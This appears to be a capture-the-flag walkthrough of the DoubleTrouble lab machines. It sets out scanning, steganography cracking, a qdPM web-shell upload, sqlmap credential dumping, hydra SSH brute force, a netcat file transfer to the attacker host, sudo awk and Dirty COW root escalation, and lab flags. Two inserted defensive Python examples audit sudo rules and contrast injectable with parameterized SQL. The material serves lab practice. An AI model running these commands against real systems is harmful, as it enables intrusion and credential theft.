DOUBLETROUBLE: 1 target machine penetration notes

nmap -sP 10.80.56.0/24

Attacker host: 10.80.56.101
Target: 10.80.56.178

nmap -p- 10.80.56.178

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

nmap -A -n -p 22 10.80.56.178
nmap -A -n -p 80 10.80.56.178

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

dirsearch -u http://10.80.56.178/

[20:26:21] 200 -  406B  - /backups/
[20:26:23] 200 -    0B  - /check.php
[20:26:30] 200 -  647B  - /images/
[20:26:30] 200 -    2KB - /index.php
[20:26:30] 200 -    2KB - /index.php/login/
[20:26:31] 200 -  762B  - /install/index.php?upgrade/
[20:26:31] 200 -  762B  - /install/
[20:26:31] 200 -  606B  - /js/
[20:26:41] 200 -  338B  - /
[20:26:42] 200 -   26B  - /robots.txt
[20:26:42] 200 -  461B  - /secret/
[20:26:48] 200 -  476B  - /uploads/

# Grab the key file
wget http://10.80.56.178/secret/doubletrouble.jpg

# Search for known exploits: qdPM 9.1 has a file upload vulnerability, but it requires logging in to the back end
searchsploit qdPM 9.1

# Crack the key file: steghide extract shows it is passphrase-protected
steghide extract -sf doubletrouble.jpg
# Brute-force the passphrase with stegseek; it succeeds
stegseek doubletrouble.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "92camaro"       
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".

# The extracted hidden content is a username and password
cat creds.txt
otisrush@localhost.com
otis666

# The vulnerability is in the account avatar upload: a web shell can be uploaded. An error is shown, but the upload still succeeds.
# The advisory says the vendor's regex is wrong: it is meant to block the upload, but it throws an error and no longer blocks.
# Upload a PHP reverse shell, then upgrade the shell to an interactive one
python -c "import pty;pty.spawn('/bin/bash')"

# Gather information
cat .htaccess
Order Deny,Allow
Deny from all
# Try privilege escalation: awk can be run as root
sudo -l
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
# Run the escalation command; root obtained
sudo awk 'BEGIN {system("/bin/sh")}'
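The root cause here is the sudoers rule itself, not awk. As an added example (not part of the original write-up), the script below audits output shaped like the `sudo -l` listing above and flags NOPASSWD rules whose binary can run commands from inside itself; the sample output and the extra systemctl rule are constructed.

```python
"""Audit sudo -l output for NOPASSWD rules that give away a root shell.
Added example, not from the write-up: it flags rules such as the awk one,
where a binary runnable as root without a password can call system()."""
import re
from typing import Dict, List

# Constructed sample mirroring the target's sudo -l output, plus one benign rule.
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
    (root) /usr/bin/systemctl restart apache2
"""

# Binaries that can run arbitrary commands from within (awk is the one abused
# on this box); extend the set with whatever your hardening baseline lists.
SHELL_CAPABLE = {"awk", "gawk", "mawk"}

# "(runas) TAG: command, command": runas in parens, optional tags, then commands.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_rules(output: str) -> List[Dict[str, object]]:
    """Return one dict per command rule found after the 'may run' header."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules and line.strip() else None
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        runas_user = m.group("runas").split(":")[0].strip()  # "ALL : ALL" -> "ALL"
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": runas_user, "nopasswd": "NOPASSWD" in tags,
                          "command": cmd.strip()})
    return rules

def find_root_shell_rules(output: str) -> List[str]:
    """Commands runnable as root without a password whose binary can spawn a shell."""
    findings = []
    for r in parse_sudo_rules(output):
        binary = str(r["command"]).split()[0].rsplit("/", 1)[-1]
        if r["runas"] in ("ALL", "root") and r["nopasswd"] and binary in SHELL_CAPABLE:
            findings.append(str(r["command"]))
    return findings
```

Any hit means the rule should be removed or narrowed to a fixed, non-interactive command line rather than a whole interpreter.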

# Another image sits in the root directory; double trouble indeed
doubletrouble.ova

python3 -m http.server 8080

wget http://10.80.56.178:8080/doubletrouble.ova


# On to the next trouble

nmap -sP 10.80.56.0/24

Attacker host: 10.80.56.101
Target: 10.80.56.178

nmap -p- 10.80.56.178

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

nmap -A -n -p 22 10.80.56.178
nmap -A -n -p 80 10.80.56.178

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
|   2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_  256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).

# The home page is a login form that gives no feedback, which suggests SQL injection; sqlmap confirms a time-based blind injection
sqlmap -u http://10.80.56.178/index.php --data="uname=admin&psw=12345" -D doubletrouble -T users -C username,password --dump

available databases [2]:
[*] doubletrouble
[*] information_schema

Database: doubletrouble
[1 table]
+-------+
| users |
+-------+

Database: doubletrouble
Table: users
[2 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1  |
| clapton  | ZubZub99 |
+----------+----------+
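The login form falls to sqlmap because user input is concatenated into the SQL text. As an added example (not code from the target), the snippet below shows that pattern beside its parameterized fix, using an in-memory SQLite table constructed from the dumped users rows in place of the site's database.

```python
"""Login query as sqlmap found it on the second box, beside the parameterized fix.
Added example, not code from the target: an in-memory SQLite table built from
the dumped users rows stands in for the site's database."""
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed table mirroring the dump above (plaintext passwords, as dumped).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("montreux", "GfsZxc1"), ("clapton", "ZubZub99")])
    return conn

def login_vulnerable(conn: sqlite3.Connection, uname: str, psw: str) -> bool:
    # Input is spliced into the SQL text, so a quote in psw rewrites the WHERE
    # clause; with no page feedback, sqlmap infers results through delays.
    sql = f"SELECT 1 FROM users WHERE username='{uname}' AND password='{psw}'"
    return conn.execute(sql).fetchone() is not None

def login_safe(conn: sqlite3.Connection, uname: str, psw: str) -> bool:
    # Bound parameters keep the input as data; the engine never parses it as SQL.
    sql = "SELECT 1 FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (uname, psw)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"  # textbook probe that injection tools start from
    print("vulnerable, real creds:", login_vulnerable(db, "clapton", "ZubZub99"))
    print("vulnerable, tautology :", login_vulnerable(db, "admin", tautology))
    print("safe, tautology       :", login_safe(db, "admin", tautology))
```

The dump also shows passwords stored in clear text; the parameterized query closes the injection, but the stored values should be salted hashes so that a dump alone does not yield working SSH credentials as it did here.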

# Got usernames and passwords from the database; try brute-forcing SSH with hydra
hydra -L user.txt -P pass.txt 10.80.56.178 ssh

[22][ssh] host: 10.80.56.178   login: clapton   password: ZubZub99

# First flag
cat user.txt
6CEA7A737C7C651F6DA7669109B5FB52clapton@doubletrouble

cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDNLhnhzhOvRSRJ2fzkWgNfJ0gxrQvFupKVcS8SDAf8GFjsNd9Gy5FgcWSt7s54j+EumUfHVNwupZuMsRYphg/zpTBwUQ4vgBGPbLUqw64tW2OucbidJ5m6QoS0UkMkjmSBKuOAy0c/BdMSLi0f6aYnlH/H9FL0JYk4jLHVawA+h1RfjlDiRBteSDKh7Mqv1RMnRHZE0bzGEMVSTkNEyeMqZbrqguuvBk2RzMHUqzVLVgw91TVPnDRqd02tI/YjECkyp/igp+4ozqPQQ361biMYF62ft7eIN2uHWzXVcb9GvezXIOzXcYmOQ+H88KUqezVMPvHDAzGRWf0pKOAccukH clapton@doubletrouble

# Found a mysterious zip; unzipping it reveals another password-protected zip inside
nc 10.80.56.101 1234 < get.zip

# Cracked
zip2john get.zip | tee hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4         (spammer.zip/creds.txt)   

# Got a string; assumed it was another user's password, but it did not work
mayer:lionheart

# Check the Linux version
uname -a
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux

# Kernel 3.2.0 is vulnerable to Dirty COW; exploit source: https://github.com/firefart/dirtycow/blob/master/dirty.c
gcc dirty.c -o dirty

# Linking fails: crypt and pthread are missing
/tmp/ccztF1Hz.o: In function `generate_password_hash':
exp.c:(.text+0x1e): undefined reference to `crypt'
/tmp/ccztF1Hz.o: In function `main':
exp.c:(.text+0x4cd): undefined reference to `pthread_create'
exp.c:(.text+0x501): undefined reference to `pthread_join'
collect2: error: ld returned 1 exit status

# Link against crypt and pthread with -l
gcc -pthread dirty.c -o dirty -lcrypt

# Run it and, as the exploit prompts, switch to the firefart user to obtain root
cat root.txt
1B8EEA89EA92CECB931E3CC25AA8DE21firefart@doubletrouble: